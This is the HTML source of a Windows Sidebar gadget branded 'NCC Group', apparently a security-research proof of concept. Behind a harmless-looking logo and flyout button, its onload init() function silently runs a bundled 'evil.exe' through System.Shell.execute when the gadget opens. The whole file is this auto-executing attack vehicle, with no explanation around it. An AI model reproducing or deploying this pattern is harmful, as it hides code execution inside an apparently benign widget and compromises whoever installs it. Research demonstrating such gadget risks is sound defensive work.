<html >
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=Unicode" />
        <title>NCC Group</title>
		<style type="text/css">
			body{
				width:130px;
				height:90px;
			}
			span{
				font-family: Tahoma:
				font-size: 12pt;
			}
		</style>
        <script type="text/jscript" language="jscript">
            // Initialize the gadget.
            function init()
            {
		System.Shell.execute("NCCGroupEx2.gadget\\evil.exe");
            }
        </script>
        <script type="text/jscript" language="jscript">
		System.Gadget.settingsUI = "settings.html";
		System.Gadget.Flyout.file = "flyout.html";
		function toggleFlyout(){
			if(System.Gadget.Flyout.show == true){
				System.Gadget.Flyout.show = false;
			}
			if(System.Gadget.Flyout.show == false){
				System.Gadget.Flyout.show = true;
			}
		}
	</script>
    </head>
	
    <body onload="init()">
	<img src="logo.gif" border="0" width="100" height="45">
	<button onClick="toggleFlyout();">NCC Group</button>            
    </body>
</html>

